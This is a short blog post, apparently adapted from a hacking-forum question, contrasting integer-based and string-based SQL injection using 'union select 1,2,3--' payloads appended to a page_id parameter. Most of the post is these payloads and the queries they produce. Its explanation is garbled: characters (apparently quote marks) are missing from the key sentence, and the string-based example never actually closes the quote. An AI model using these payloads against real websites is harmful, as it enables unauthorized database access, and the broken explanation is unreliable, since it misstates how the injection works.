Wednesday, May 24, 2017
Difference between integer based and string based SQL injection
Difference between integer based and string based SQL injection
Hi friends this one i had posted a question on hackforums about difference between string based and integer based SQL injection it can be explained as follows
integer
SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1 ?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1
string
SELECT * FROM pages WHERE page_id="10" [inject] order by title limit 1,1 ?id=10 union select 1,2,3--+
final:
select * from pages where page_id="10" union select 1,2,3--+ order by title limit 1,1
so in integer based SQL injection you dont have to put a and in string based SQL injection you have to put a and a + sign at the end
the original post here
enjoy
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.